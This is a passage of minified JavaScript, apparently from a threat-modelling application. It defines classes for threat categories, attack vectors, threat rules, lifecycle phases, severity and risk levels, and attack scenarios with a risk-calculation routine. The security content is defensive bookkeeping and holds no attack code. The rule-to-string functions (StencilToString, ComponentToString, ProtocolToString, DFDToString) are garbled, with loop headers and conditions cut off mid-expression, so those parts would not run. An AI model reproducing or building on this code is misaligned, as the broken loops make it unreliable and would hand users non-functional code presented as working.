this.Data.threatCategorieIDs.forEach(e=>a.push(this.config.GetThreatCategory(e))),a}AddThreatCategory(a){this.ThreatCategories.includes(a)||this.Data.threatCategorieIDs.push(a.ID)}RemoveThreatCategory(a){this.ThreatCategories.includes(a)&&this.Data.threatCategorieIDs.splice(this.Data.threatCategorieIDs.indexOf(a.ID),1)}FindReferences(a,e){let i=[];return this.ThreatCategories.forEach(n=>i.push({Type:li.DeleteThreatCategory,Param:n})),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{n.Type==li.DeleteThreatCategory&&e.DeleteThreatCategory(n.Param)})}static FromJSON(a,e){return new Zb(a,e)}}var lr=(()=>{return(t=lr||(lr={})).Concept="C",t.Implementation="I",t.Production="P",t.Distribution="D",t.Setup="S",t.Operation="O",t.Update="U",t.Maintenance="M",t.EndOfLife="E",lr;var t})();class y2{static GetKeys(){return[lr.Concept,lr.Implementation,lr.Production,lr.Distribution,lr.Setup,lr.Operation,lr.Update,lr.Maintenance,lr.EndOfLife]}static GetMitigationKeys(){return[lr.Concept,lr.Implementation,lr.Production,lr.Operation,lr.Update,lr.Maintenance]}static ToString(a){switch(a){case lr.Concept:return"lifecycle.Concept";case lr.Implementation:return"lifecycle.Implementation";case lr.Production:return"lifecycle.Production";case lr.Distribution:return"lifecycle.Distribution";case lr.Setup:return"lifecycle.Setup";case lr.Operation:return"lifecycle.Operation";case lr.Update:return"lifecycle.Update";case lr.Maintenance:return"lifecycle.Maintenance";case lr.EndOfLife:return"lifecycle.EndOfLife";default:return console.error("Missing Life Cycle in LifeCycleUtil.ToString()"),"Undefined"}}}var Nm=(()=>{return(t=Nm||(Nm={}))[t.Weakness=1]="Weakness",t[t.AttackTechnique=2]="AttackTechnique",Nm;var t})();class eM{static GetTypes(){return[Nm.Weakness,Nm.AttackTechnique]}static GetTypeNames(){let a=[];return eM.GetTypes().forEach(e=>a.push(eM.ToString(e))),a}static ToString(a){switch(a){case Nm.Weakness:return"general.Weakness";case Nm.AttackTechnique:return"general.AttackTechnique";default:return console.error("Missing Option Type in AttackVectorTypes.ToString()"),"Undefined"}}}var cn=(()=>{return(t=cn||(cn={}))[t.None=0]="None",t[t.Low=1]="Low",t[t.Medium=2]="Medium",t[t.High=3]="High",t[t.Critical=4]="Critical",cn;var t})();class vn{static GetTypes(){return[cn.None,cn.Low,cn.Medium,cn.High,cn.Critical]}static GetTypesDashboard(){return[cn.Low,cn.Medium,cn.High,cn.Critical]}static ToString(a){switch(a){case cn.None:return"properties.threatseverity.None";case cn.Low:return"properties.threatseverity.Low";case cn.Medium:return"properties.threatseverity.Medium";case cn.High:return"properties.threatseverity.High";case cn.Critical:return"properties.threatseverity.Critical"}}}class zp extends Ln{constructor(a,e){super(a),this.config=e,this.OriginTypes||(this.OriginTypes=[]),this.ThreatIntroduced||(this.Data.ThreatIntroduced=[]),this.ThreatExploited||(this.Data.ThreatExploited=[]),this.Data.threatCategorieIDs||(this.Data.threatCategorieIDs=[]),this.AttackTechnique&&!this.AttackTechnique.CVSS&&(this.AttackTechnique.CVSS={})}get ThreatIntroduced(){return this.Data.ThreatIntroduced}get ThreatExploited(){return this.Data.ThreatExploited}get Adversaries(){return this.Data.Adversaries}set Adversaries(a){this.Data.Adversaries=a}get OriginTypes(){return this.Data.OriginTypes}set OriginTypes(a){this.Data.OriginTypes=a,a.includes(Nm.Weakness)&&!this.Weakness&&(this.Weakness={}),a.includes(Nm.AttackTechnique)&&!this.AttackTechnique&&(this.AttackTechnique={CVSS:{}})}get ThreatCategories(){let a=[];return this.Data.threatCategorieIDs.forEach(e=>a.push(this.config.GetThreatCategory(e))),a}set ThreatCategories(a){this.Data.threatCategorieIDs=null==a?void 0:a.map(e=>e.ID)}get Weakness(){return this.Data.Weakness}set Weakness(a){this.Data.Weakness=a}get AttackTechnique(){return this.Data.AttackTechnique}set AttackTechnique(a){this.Data.AttackTechnique=a}get Severity(){return this.Data.Severity}set Severity(a){this.Data.Severity=a}FindReferences(a,e){let i=[];return e.GetThreatRules().filter(n=>{var r;return(null===(r=n.AttackVector)||void 0===r?void 0:r.ID)==this.ID}).forEach(n=>{i.push({Type:li.DeleteThreatRule,Param:n})}),e.GetControls().filter(n=>n.MitigatedAttackVectors.some(r=>r.ID==this.ID)).forEach(n=>{i.push({Type:li.RemoveAttackVectorFromControl,Param:n})}),null==a||a.GetAttackScenarios().filter(n=>{var r;return(null===(r=n.AttackVector)||void 0===r?void 0:r.ID)==this.ID}).forEach(n=>{i.push({Type:li.DeleteAttackScenario,Param:n})}),i}OnDelete(a,e){let i=this.FindReferences(a,e),n=e.FindGroupOfAttackVector(this);n&&n.RemoveAttackVector(this),i.forEach(r=>{r.Type==li.DeleteThreatRule?e.DeleteThreatRule(r.Param):r.Type==li.RemoveAttackVectorFromControl?r.Param.MitigatedAttackVectors=r.Param.MitigatedAttackVectors.filter(c=>c.ID!=this.ID):r.Type==li.DeleteAttackScenario&&a.DeleteAttackScenario(r.Param)})}static FromJSON(a,e){return new zp(a,e)}}class tM extends Ln{constructor(a,e){super(a),this.config=e,this.Data.attackVectorGroupIDs||(this.Data.attackVectorGroupIDs=[]),this.Data.attackVectorIDs||(this.Data.attackVectorIDs=[])}get SubGroups(){let a=[];return this.Data.attackVectorGroupIDs.forEach(e=>a.push(this.config.GetAttackVectorGroup(e))),a}get AttackVectors(){let a=[];return this.Data.attackVectorIDs.forEach(e=>a.push(this.config.GetAttackVector(e))),a}AddAttackVectorGroup(a){this.SubGroups.includes(a)||this.Data.attackVectorGroupIDs.push(a.ID)}RemoveAttackVectorGroup(a){this.SubGroups.includes(a)&&this.Data.attackVectorGroupIDs.splice(this.Data.attackVectorGroupIDs.indexOf(a.ID),1)}AddAttackVector(a){this.AttackVectors.includes(a)||this.Data.attackVectorIDs.push(a.ID)}RemoveAttackVector(a){this.AttackVectors.includes(a)&&this.Data.attackVectorIDs.splice(this.Data.attackVectorIDs.indexOf(a.ID),1)}FindReferences(a,e){let i=[];return this.SubGroups.forEach(n=>i.push({Type:li.DeleteAttackVectorGroup,Param:n})),this.AttackVectors.forEach(n=>i.push({Type:li.DeleteAttackVector,Param:n})),i}OnDelete(a,e){let i=this.FindReferences(a,e),n=e.FindGroupOfAttackVectorGroup(this);n&&n.RemoveAttackVectorGroup(this),i.forEach(r=>{r.Type==li.DeleteAttackVector?e.DeleteAttackVector(r.Param):r.Type==li.DeleteAttackVectorGroup&&e.DeleteAttackVectorGroup(r.Param)})}static FromJSON(a,e){return new tM(a,e)}}var Wp=(()=>{return(t=Wp||(Wp={}))[t.YesNo=1]="YesNo",Wp;var t})();class Pl{static GetOptions(a){return a===Wp.YesNo?[{Key:"general.Yes",Value:!0},{Key:"general.No",Value:!1},{Key:"general.N/A",Value:"undefined"}]:(console.error("Missing Option Type in OptionTypeUtil.GetOptions()",a),null)}static GetTypes(){return[Wp.YesNo]}static GetTypeNames(){let a=[];return Pl.GetTypes().forEach(e=>a.push(Pl.ToString(e))),a}static ToString(a){return a===Wp.YesNo?"optiontype.yesno":(console.error("Missing Option Type in OptionTypeUtil.ToString()"),"Undefined")}}class iM extends Ln{constructor(a,e){super(a),this.config=e,this.ChangesPerOption||(this.Data.ChangesPerOption={}),this.OptionType||(this.OptionType=Wp.YesNo)}get Question(){return this.Data.Question}set Question(a){this.Data.Question=a}get ComponentType(){return this.config.GetMyComponentType(this.Data.componentTypeID)}set ComponentType(a){this.Data.componentTypeID=a.ID}get OptionType(){return this.Data.OptionType}set OptionType(a){this.Data.OptionType=a}get Property(){return this.ComponentType.Properties.find(a=>a.ID==this.Data.propertyID)}set Property(a){this.Data.propertyID=null==a?void 0:a.ID,a&&this.OptionType==Wp.YesNo&&Pl.GetOptions(this.OptionType).forEach(e=>{this.ChangesPerOption[e.Key]={},this.ChangesPerOption[e.Key].Active=null!=e.Value,this.ChangesPerOption[e.Key].Value=e.Value})}get ChangesPerOption(){return this.Data.ChangesPerOption}FindReferences(a,e){let i=[];return null==a||a.GetAttackScenarios().filter(n=>{var r;return(null===(r=n.ThreatQuestion)||void 0===r?void 0:r.ID)==this.ID}).forEach(n=>{i.push({Type:li.DeleteAttackScenario,Param:n})}),null==a||a.GetComponents().filter(n=>Object.keys(n.ThreatQuestions).includes(this.ID)).forEach(n=>{i.push({Type:li.RemoveThreatQuestionFromComponent,Param:n})}),i}OnDelete(a,e){this.FindReferences(a,e).forEach(n=>{n.Type==li.DeleteAttackScenario?a.DeleteAttackScenario(n.Param):n.Type==li.RemoveThreatQuestionFromComponent&&n.Param.RemoveThreatQuestion(this)})}static FromJSON(a,e){return new iM(a,e)}}var on=(()=>{return(t=on||(on={}))[t.Stencil=1]="Stencil",t[t.DFD=2]="DFD",t[t.Component=3]="Component",t[t.Protocol=4]="Protocol",on;var t})(),nl=(()=>{return(t=nl||(nl={}))[t.EachElement=1]="EachElement",t[t.OnceForAllElements=2]="OnceForAllElements",t[t.OnceForEachElement=3]="OnceForEachElement",nl;var t})();class MG{static GetTypes(){return[nl.EachElement,nl.OnceForAllElements,nl.OnceForEachElement]}static ToString(a){switch(a){case nl.EachElement:return"properties.eachElement";case nl.OnceForAllElements:return"properties.onceForAllElements";case nl.OnceForEachElement:return"properties.onceForEachElement";default:return console.error("Missing Rule Generation Type in RuleGenerationTypes.ToString()"),"Undefined"}}}var ya=(()=>{return(t=ya||(ya={}))[t.Property=1]="Property",t[t.DataFlowCrosses=2]="DataFlowCrosses",t[t.PhysicalElement=3]="PhysicalElement",t[t.SenderInterface=10]="SenderInterface",t[t.ReceiverInterface=11]="ReceiverInterface",ya;var t})(),cc=(()=>{return(t=cc||(cc={})).Equals="==",t.EqualsNot="!=",t.GreaterThan=">",t.LessThan="<",t.GreaterThanOrEquals=">=",t.LessThanOrEquals="<=",cc;var t})();class Fg{static ToString(a,e,i){return a.RuleType==on.DFD?Fg.DFDToString(a.DFDRestriction,e,i):a.RuleType==on.Stencil?Fg.StencilToString(a.StencilRestriction,e,i):a.RuleType==on.Component?Fg.ComponentToString(a.ComponentRestriction,e,i):a.RuleType==on.Protocol?Fg.ProtocolToString(a.ProtocolRestriction,e,i):void 0}static StencilToString(a,e,i){let n="",r=k=>"{"+k+"}",c=k=>" "+k+" ",d=e.Config.GetStencilType(a.stencilTypeID),T=0;for(let k=0;kT;for(Y&&0!=k&&(n+=a.DetailRestrictions[k-1].IsOR?" OR ":" AND ");q.Layer>T;)n+="(",T++;for(;q.Layerpe.ID==q.PropertyRest.ID);n+="."+r(te&&te.DisplayName?te.DisplayName:q.PropertyRest.ID),n+=c(q.PropertyRest.ComparisonType),n+=r(te&&te.Type==Ii.LowMediumHighSelect?i.instant(An.ToString(q.PropertyRest.Value)):String(q.PropertyRest.Value))}else if(q.RestType==ya.DataFlowCrosses)n+=" crosses "+r(q.DataflowRest.TrustAreaIDs.map(te=>e.Config.GetStencilType(te)).map(te=>te.Name).join(" "+i.instant("general.or")+" "));else if(q.RestType==ya.PhysicalElement){let te=Sc.GetPhyiscalID(d.ElementTypeID),Re=e.Config.GetStencilTypes().find(Fe=>Fe.IsDefault&&Fe.ElementTypeID==te).Properties.find(Fe=>Fe.ID==q.PhyElementRest.Property.ID);n+="."+r(i.instant("properties.PhysicalElement"))+"."+r(Re&&Re.DisplayName?Re.DisplayName:q.PhyElementRest.Property.ID),n+=c(q.PhyElementRest.Property.ComparisonType.toString()),n+=r(Re&&Re.Type==Ii.LowMediumHighSelect?i.instant(An.ToString(q.PhyElementRest.Property.Value)):String(q.PhyElementRest.Property.Value))}}for(;T>0;)n+=")",T--;return n}static ComponentToString(a,e,i){let n="",r=k=>"{"+k+"}",c=k=>" "+k+" ",d=e.Config.GetMyComponentType(a.componentTypeID),T=0;for(let k=0;kT;for(Y&&0!=k&&(n+=a.DetailRestrictions[k-1].IsOR?" OR ":" AND ");q.Layer>T;)n+="(",T++;for(;q.Layerpe.ID==q.PropertyRest.ID);n+="."+r(te&&te.DisplayName?te.DisplayName:q.PropertyRest.ID),n+=c(q.PropertyRest.ComparisonType),n+=r(te&&te.Type==Ii.LowMediumHighSelect?i.instant(An.ToString(q.PropertyRest.Value)):String(q.PropertyRest.Value))}}for(;T>0;)n+=")",T--;return n}static ProtocolToString(a,e,i){let n="",r=k=>"{"+k+"}",c=k=>" "+k+" ",d=e.Config.GetProtocol(a.protocolID),T=0;for(let k=0;kT;for(Y&&0!=k&&(n+=a.DetailRestrictions[k-1].IsOR?" OR ":" AND ");q.Layer>T;)n+="(",T++;for(;q.Layerpe.ID==q.PropertyRest.ID);n+="."+r(te&&te.DisplayName?te.DisplayName:q.PropertyRest.ID),n+=c(q.PropertyRest.ComparisonType),n+=r(te&&te.Type==Ii.LowMediumHighSelect?i.instant(An.ToString(q.PropertyRest.Value)):String(q.PropertyRest.Value))}}for(;T>0;)n+=")",T--;return n}static DFDToString(a,e,i){var n,r;let c="";const d=Y=>"{"+Y+"}",T=Y=>" "+Y+" ",k=(Y,te)=>-1==Y?"Data Flow":0==Y?i.instant("properties.Sender"):Y==te-1?i.instant("properties.Receiver"):"Node"+(Y-1).toString();let q=0;for(let Y=0;Yq;for(pe&&0!=Y&&(c+=a.NodeRestrictions[Y-1].IsOR?" OR ":" AND ");te.Layer>q;)c+="(",q++;for(;te.LayerFe.IsDefault&&Fe.ElementTypeID==Et.DataFlow).Properties.find(Fe=>Fe.ID==te.PropertyRest.ID):null===(n=a.NodeTypes[te.NodeNumber])||void 0===n||n.TypeIDs.forEach(Fe=>{Re||(Re=e.Config.GetStencilType(Fe).Properties.find(Ne=>Ne.ID==te.PropertyRest.ID))}),c+="."+d(Re&&Re.DisplayName?Re.DisplayName:te.PropertyRest.ID),c+=T(te.PropertyRest.ComparisonType),c+=d(Re&&Re.Type==Ii.LowMediumHighSelect?i.instant(An.ToString(te.PropertyRest.Value)):String(te.PropertyRest.Value))}else if(te.RestType==ya.DataFlowCrosses)c+=" crosses "+d(te.DataflowRest.TrustAreaIDs.map(Re=>e.Config.GetStencilType(Re)).map(Re=>Re.Name).join(" "+i.instant("general.or")+" "));else if(te.RestType==ya.PhysicalElement){let Re=null;null===(r=a.NodeTypes[te.NodeNumber])||void 0===r||r.TypeIDs.forEach(Fe=>{if(!Re){let Ne=Sc.GetPhyiscalID(e.Config.GetStencilType(Fe).ElementTypeID);Ne&&(Re=e.Config.GetStencilTypes().find(ut=>ut.IsDefault&&ut.ElementTypeID==Ne).Properties.find(ut=>ut.ID==te.PhyElementRest.Property.ID))}}),c+="."+d(i.instant("properties.PhysicalElement"))+"."+d(te.PhyElementRest.Property.ID),c+=d(Re&&Re.Type==Ii.LowMediumHighSelect?i.instant(An.ToString(te.PhyElementRest.Property.Value)):String(te.PhyElementRest.Property.Value))}else if(te.RestType==ya.SenderInterface){c+="."+d(i.instant("properties.SenderInterface"));const Re=e.Config.GetStencilTypes().find(Fe=>Fe.IsDefault&&Fe.ElementTypeID==Et.Interface).Properties.find(Fe=>Fe.ID==te.SenderInterfaceRestriction.Property.ID);c+="."+d(Re&&Re.DisplayName?Re.DisplayName:te.SenderInterfaceRestriction.Property.ID),c+=T(te.PropertyRest.ComparisonType),c+=d(Re&&Re.Type==Ii.LowMediumHighSelect?i.instant(An.ToString(te.SenderInterfaceRestriction.Property.Value)):String(te.SenderInterfaceRestriction.Property.Value))}else if(te.RestType==ya.ReceiverInterface){c+="."+d(i.instant("properties.ReceiverInterface"));const Re=e.Config.GetStencilTypes().find(Fe=>Fe.IsDefault&&Fe.ElementTypeID==Et.Interface).Properties.find(Fe=>Fe.ID==te.ReceiverInterfaceRestriction.Property.ID);c+="."+d(Re&&Re.DisplayName?Re.DisplayName:te.ReceiverInterfaceRestriction.Property.ID),c+=T(te.PropertyRest.ComparisonType),c+=d(Re&&Re.Type==Ii.LowMediumHighSelect?i.instant(An.ToString(te.ReceiverInterfaceRestriction.Property.Value)):String(te.ReceiverInterfaceRestriction.Property.Value))}}for(;q>0;)c+=")",q--;return c}}class Fp extends Ln{constructor(a,e){super(a),this.config=e,null==this.Data.IsActive&&(this.Data.IsActive=!0),null==this.Data.RuleGenerationType&&(this.Data.RuleGenerationType=nl.EachElement),this.Data.Mapping||(this.Data.Mapping={}),this.Data.overridenRuleIDs||(this.Data.overridenRuleIDs=[])}get IsActive(){return this.Data.IsActive}set IsActive(a){this.Data.IsActive=a}get RuleType(){return this.Data.RuleType}set RuleType(a){this.Data.RuleType=a,a==on.Stencil?this.StencilRestriction||(this.StencilRestriction={stencilTypeID:"",DetailRestrictions:[]}):a==on.Component?this.ComponentRestriction||(this.ComponentRestriction={componentTypeID:"",DetailRestrictions:[]}):a==on.DFD?this.Data.DFDRestriction||(this.Data.DFDRestriction={AppliesReverse:!1,Target:-1,NodeTypes:[{TypeIDs:[]},{TypeIDs:[]}],NodeRestrictions:[]}):a!=on.Protocol||this.ProtocolRestriction||(this.ProtocolRestriction={protocolID:"",DetailRestrictions:[]})}get RuleGenerationType(){return this.Data.RuleGenerationType}set RuleGenerationType(a){this.Data.RuleGenerationType=a}get Mapping(){return this.Data.Mapping}set Mapping(a){this.Data.Mapping=a}get AttackVector(){return this.config.GetAttackVector(this.Mapping.AttackVectorID)}set AttackVector(a){this.Mapping.AttackVectorID=null==a?void 0:a.ID,a&&(this.Severity=a.Severity)}get ThreatCategories(){return this.config.GetThreatCategories().filter(a=>{var e;return null===(e=this.Mapping.ThreatCategoryIDs)||void 0===e?void 0:e.includes(a.ID)})}set ThreatCategories(a){this.Mapping.ThreatCategoryIDs=null==a?void 0:a.map(e=>e.ID)}get Severity(){return this.Data.Severity}set Severity(a){this.Data.Severity=a}get StencilRestriction(){return this.Data.StencilRestriction}set StencilRestriction(a){this.Data.StencilRestriction=a}get DFDRestriction(){return this.Data.DFDRestriction}set DFDRestriction(a){this.Data.DFDRestriction=a}get ComponentRestriction(){return this.Data.ComponentRestriction}set ComponentRestriction(a){this.Data.ComponentRestriction=a}get ProtocolRestriction(){return this.Data.ProtocolRestriction}set ProtocolRestriction(a){this.Data.ProtocolRestriction=a}get OverridenRules(){let a=[];return this.Data.overridenRuleIDs.forEach(e=>a.push(this.config.GetThreatRule(e))),a}set OverridenRules(a){this.Data.overridenRuleIDs=null==a?void 0:a.map(e=>e.ID)}FindReferences(a,e){let i=[];return null==a||a.GetAttackScenarios().filter(n=>{var r;return(null===(r=n.ThreatRule)||void 0===r?void 0:r.ID)==this.ID}).forEach(n=>{i.push({Type:li.DeleteAttackScenario,Param:n})}),i}OnDelete(a,e){let i=this.FindReferences(a,e),n=e.FindGroupOfThreatRule(this);n&&n.RemoveThreatRule(this),i.forEach(r=>{r.Type==li.DeleteAttackScenario&&a.DeleteAttackScenario(r.Param)})}static FromJSON(a,e){return new Fp(a,e)}}class aM extends Ln{constructor(a,e){super(a),this.config=e,this.Data.threatRuleGroupIDs||(this.Data.threatRuleGroupIDs=[]),this.Data.threatRuleIDs||(this.Data.threatRuleIDs=[])}get SubGroups(){let a=[];return this.Data.threatRuleGroupIDs.forEach(e=>a.push(this.config.GetThreatRuleGroup(e))),a}get ThreatRules(){let a=[];return this.Data.threatRuleIDs.forEach(e=>a.push(this.config.GetThreatRule(e))),a}get RuleType(){return this.Data.RuleType}set RuleType(a){}AddThreatRuleGroup(a){this.SubGroups.includes(a)||this.Data.threatRuleGroupIDs.push(a.ID)}RemoveThreatRuleGroup(a){this.SubGroups.includes(a)&&this.Data.threatRuleGroupIDs.splice(this.Data.threatRuleGroupIDs.indexOf(a.ID),1)}AddThreatRule(a){this.ThreatRules.includes(a)||this.Data.threatRuleIDs.push(a.ID)}RemoveThreatRule(a){this.ThreatRules.includes(a)&&this.Data.threatRuleIDs.splice(this.Data.threatRuleIDs.indexOf(a.ID),1)}FindReferences(a,e){let i=[];return this.SubGroups.forEach(n=>i.push({Type:li.DeleteThreatRuleGroup,Param:n})),this.ThreatRules.forEach(n=>i.push({Type:li.DeleteThreatRule,Param:n})),i}OnDelete(a,e){let i=this.FindReferences(a,e),n=e.FindGroupOfThreatRuleGroup(this);n&&n.RemoveThreatRuleGroup(this),i.forEach(r=>{r.Type==li.DeleteThreatRule?e.DeleteThreatRule(r.Param):r.Type==li.DeleteThreatRuleGroup&&e.DeleteThreatRuleGroup(r.Param)})}static FromJSON(a,e){return new aM(a,e)}}var zn=(()=>{return(t=zn||(zn={}))[t.New=1]="New",t[t.Stable=2]="Stable",t[t.Removed=3]="Removed",zn;var t})(),_o=(()=>{return(t=_o||(_o={}))[t.NotSet=1]="NotSet",t[t.NotApplicable=2]="NotApplicable",t[t.NeedsInvestigation=3]="NeedsInvestigation",t[t.Verified=4]="Verified",t[t.Proven=5]="Proven",t[t.Duplicate=6]="Duplicate",_o;var t})();class ku{static GetThreatStates(){return[_o.NotSet,_o.NotApplicable,_o.NeedsInvestigation,_o.Verified,_o.Proven,_o.Duplicate]}static ToString(a){switch(a){case _o.NotSet:return"properties.threatstate.NotSet";case _o.NotApplicable:return"properties.threatstate.NotApplicable";case _o.NeedsInvestigation:return"properties.threatstate.NeedsInvestigation";case _o.Verified:return"properties.threatstate.Verified";case _o.Proven:return"properties.threatstate.Proven";case _o.Duplicate:return"properties.threatstate.Duplicate";default:return console.error("Missing State in ThreatStateUtil.ToString()",a),"Undefined"}}}var Lm=(()=>{return(t=Lm||(Lm={}))[t.Avoid=1]="Avoid",t[t.Mitigate=2]="Mitigate",t[t.Transfer=3]="Transfer",t[t.Accept=4]="Accept",Lm;var t})();class fT{static GetKeys(){return[Lm.Avoid,Lm.Mitigate,Lm.Transfer,Lm.Accept]}static ToString(a){switch(a){case Lm.Avoid:return"properties.riskstrategy.Avoid";case Lm.Mitigate:return"properties.riskstrategy.Mitigate";case Lm.Transfer:return"properties.riskstrategy.Transfer";case Lm.Accept:return"properties.riskstrategy.Accept";default:return console.error("Missing State in RiskStrategyUtil.ToString()",a),"Undefined"}}}class Rc extends Ln{constructor(a,e,i){super(a),this.project=e,this.config=i,this.Data.Mapping||(this.Data.Mapping={}),this.Data.targetIDs||(this.Data.targetIDs=[]),this.Data.ThreatState||(this.ThreatState=_o.NotSet),this.Data.systemThreatIDs||(this.Data.systemThreatIDs=[]),this.Data.threatActorIDs||(this.Data.threatActorIDs=[]),this.Data.linkedScenarioIDs||(this.Data.linkedScenarioIDs=[]),this.Data.myTagIDs||(this.Data.myTagIDs=[])}get Name(){if(null!=this.Data.Name)return this.Data.Name;let a="";return this.ThreatRule?a+=this.ThreatRule.Name+" on ":this.AttackVector&&(a+=this.AttackVector.GetProperty("Name")+" on "),this.Target?a+=this.Target.GetProperty("Name"):this.Targets&&(a+=this.Targets.map(e=>e.GetProperty("Name")).join(", ")),a}set Name(a){this.Data.Name=a,this.NameChanged.emit(this.Name)}get Number(){return this.Data.Number}set Number(a){this.Data.Number=a&&String(a)}get ViewID(){return this.Data.ViewID}set ViewID(a){this.Data.ViewID=a}get MappingState(){return this.Data.MappingState}set MappingState(a){this.Data.MappingState=a}get ThreatState(){return this.Data.ThreatState}set ThreatState(a){this.Data.ThreatState=Number(a),[_o.NotApplicable,_o.Duplicate].includes(Number(a))&&this.GetCountermeasures().forEach(e=>{(1==e.AttackScenarios.length||e.AttackScenarios.every(i=>[_o.NotApplicable,_o.Duplicate].includes(i.ThreatState)||i==this))&&(e.MitigationState=Number(a)==_o.Duplicate?Ra.Duplicate:Ra.NotApplicable)})}get IsGenerated(){return this.Data.IsGenerated}set IsGenerated(a){this.Data.IsGenerated=a}get ScoreCVSS(){return this.Data.ScoreCVSS}set ScoreCVSS(a){this.Data.ScoreCVSS=a}get ScoreOwaspRR(){return this.Data.ScoreOwaspRR}set ScoreOwaspRR(a){this.Data.ScoreOwaspRR=a}get Severity(){return this.Data.Severity}set Severity(a){this.Data.Severity=+a}get SeverityReason(){return this.Data.SeverityReason}set SeverityReason(a){this.Data.SeverityReason=a}get Likelihood(){return this.Data.Likelihood}set Likelihood(a){this.Data.Likelihood=+a}get LikelihoodReason(){return this.Data.LikelihoodReason}set LikelihoodReason(a){this.Data.LikelihoodReason=a}get Risk(){return this.Data.Risk}set Risk(a){this.Data.Risk=+a}get RiskReason(){return this.Data.RiskReason}set RiskReason(a){this.Data.RiskReason=a}get RiskStrategy(){return this.Data.RiskStrategy}set RiskStrategy(a){this.Data.RiskStrategy=+a}get RiskStrategyReason(){return this.Data.RiskStrategyReason}set RiskStrategyReason(a){this.Data.RiskStrategyReason=a}get Target(){let a=this.project.GetDFDElement(this.Data.targetID);return a||(a=this.project.GetComponent(this.Data.targetID)),a||(a=this.project.GetContextElement(this.Data.targetID)),a}set Target(a){this.Data.targetID=null==a?void 0:a.ID}get Targets(){let a=[];return this.Data.targetIDs.forEach(e=>{let i=this.project.GetDFDElement(e);if(i)a.push(i);else{let n=this.project.GetComponent(e);if(n)a.push(n);else{let r=this.project.GetContextElement(e);r&&a.push(r)}}}),a}set Targets(a){this.Data.targetIDs=a.map(e=>e.ID)}get Mapping(){return this.Data.Mapping}set Mapping(a){this.Data.Mapping=a}get AttackVector(){var a;return this.config.GetAttackVector(null===(a=this.Mapping.Threat)||void 0===a?void 0:a.AttackVectorID)}set AttackVector(a){this.Mapping.Threat.AttackVectorID=null==a?void 0:a.ID,a&&(this.ThreatCategories=a.ThreatCategories)}get ThreatCategories(){return this.config.GetThreatCategories().filter(a=>{var e;return null===(e=this.Mapping.Threat.ThreatCategoryIDs)||void 0===e?void 0:e.includes(a.ID)})}set ThreatCategories(a){this.Mapping.Threat.ThreatCategoryIDs=a.map(e=>e.ID)}get ThreatQuestion(){return this.config.GetThreatQuestion(this.Mapping.QuestionID)}set ThreatQuestion(a){this.Mapping.QuestionID=a.ID}get ThreatRule(){return this.config.GetThreatRule(this.Mapping.RuleID)}set ThreatRule(a){this.Mapping.RuleID=a.ID}get ThreatMnemonicLetterID(){return this.Mapping.MnemonicID}set ThreatMnemonicLetterID(a){this.Mapping.MnemonicID=a}get CveEntry(){return this.Mapping.CVE}set CveEntry(a){this.Mapping.CVE=a}get RuleStillApplies(){return this.Data.RuleStillApplies}set RuleStillApplies(a){this.Data.RuleStillApplies=a}get SystemThreats(){let a=[];return this.Data.systemThreatIDs.forEach(e=>a.push(this.project.GetSystemThreat(e))),a}set SystemThreats(a){this.Data.systemThreatIDs=null==a?void 0:a.map(e=>e.ID)}get ThreatSources(){let a=[];return this.Data.threatActorIDs.forEach(e=>a.push(this.project.GetThreatActor(e))),a}set ThreatSources(a){this.Data.threatActorIDs=null==a?void 0:a.map(e=>e.ID)}get LinkedScenarios(){let a=[];return this.Data.linkedScenarioIDs.forEach(e=>a.push(this.project.GetAttackScenario(e))),a}set LinkedScenarios(a){this.Data.linkedScenarioIDs=null==a?void 0:a.map(e=>e.ID)}get MyTags(){let a=[];return this.Data.myTagIDs.forEach(e=>a.push(this.project.GetMyTag(e))),a}set MyTags(a){this.Data.myTagIDs=null==a?void 0:a.map(e=>e.ID)}SetMapping(a,e,i,n,r,c,d,T){var k,q;this.MappingState=zn.New,this.Mapping.Threat={AttackVectorID:a,ThreatCategoryIDs:e},r&&(this.ThreatRule=r,this.Description=r.Description,r.Severity?this.Severity=r.Severity:this.AttackVector&&(this.Severity=this.AttackVector.Severity),!(null===(q=null===(k=r.AttackVector)||void 0===k?void 0:k.AttackTechnique)||void 0===q)&&q.CVSS&&(this.ScoreCVSS=JSON.parse(JSON.stringify(r.AttackVector.AttackTechnique.CVSS)))),c&&(this.ThreatQuestion=c,0==this.Description.length&&(this.Description=c.Description)),d&&T?(this.ThreatMnemonicLetterID=T.ID,this.Name=T.Name+" on "+(null==i?void 0:i.GetProperty("Name")),this.Description=T.Description,T.threatCategoryID&&(this.ThreatCategories=[d.GetThreatCategory(T)])):this.Name=null,this.Target=i,this.Targets=n,this.RuleStillApplies=!0}CalculateRisk(){if(null!=this.Severity&&null!=this.Likelihood){const a=this.Likelihood,e=this.Severity;let i=cn.Critical;e==cn.None?i=cn.None:a==dr.High?[cn.High,cn.Medium].includes(e)?i=cn.High:e==cn.Low&&(i=cn.Medium):a==dr.Medium?i=e:a==dr.Low&&(i=cn.Low,[cn.Medium,cn.High].includes(e)?i=cn.Medium:e==cn.Critical&&(i=cn.High)),this.Risk=i}}AddLinkedAttackScenario(a){this.LinkedScenarios.includes(a)||this.Data.linkedScenarioIDs.push(a.ID)}RemoveLinkedAttackScenario(a){const e=this.Data.linkedScenarioIDs.indexOf(a);e>=0&&this.Data.linkedScenarioIDs.splice(e,1)}AddMyTag(a){this.MyTags.includes(a)||this.Data.myTagIDs.push(a.ID)}RemoveMyTag(a){const e=this.Data.myTagIDs.indexOf(a);e>=0&&this.Data.myTagIDs.splice(e,1)}GetCountermeasures(){return this.project.GetCountermeasuresApplicable().filter(a=>a.AttackScenarios.includes(this))}GetTestCases(){return this.project.GetTestCases().filter(a=>a.LinkedScenarios.includes(this))}GetAffectedAssetObjects(){let a=[];return this.Target&&this.Target.GetProperty("ProcessedData")&&a.push(...this.Target.GetProperty("ProcessedData")),this.Targets&&this.Targets.forEach(e=>{e.GetProperty("ProcessedData")&&e.GetProperty("ProcessedData").forEach(i=>{a.includes(i)||a.push(i)})}),a}GetDiagram(){return this.project.GetView(this.ViewID)}CheckUniqueNumber(){return this.project.GetAttackScenarios().some(a=>a.Number==this.Number&&a.ID!=this.ID)}GetLongName(){var a;return"AS"+Gi.EmptyIfNull(this.Number)+") "+this.Name+" ("+(this.Target?this.Target.GetProperty("Name"):null===(a=this.Targets)||void 0===a?void 0:a.map(e=>e.GetProperty("Name")).join(", "))+")"}FindReferences(a,e){let i=[];return 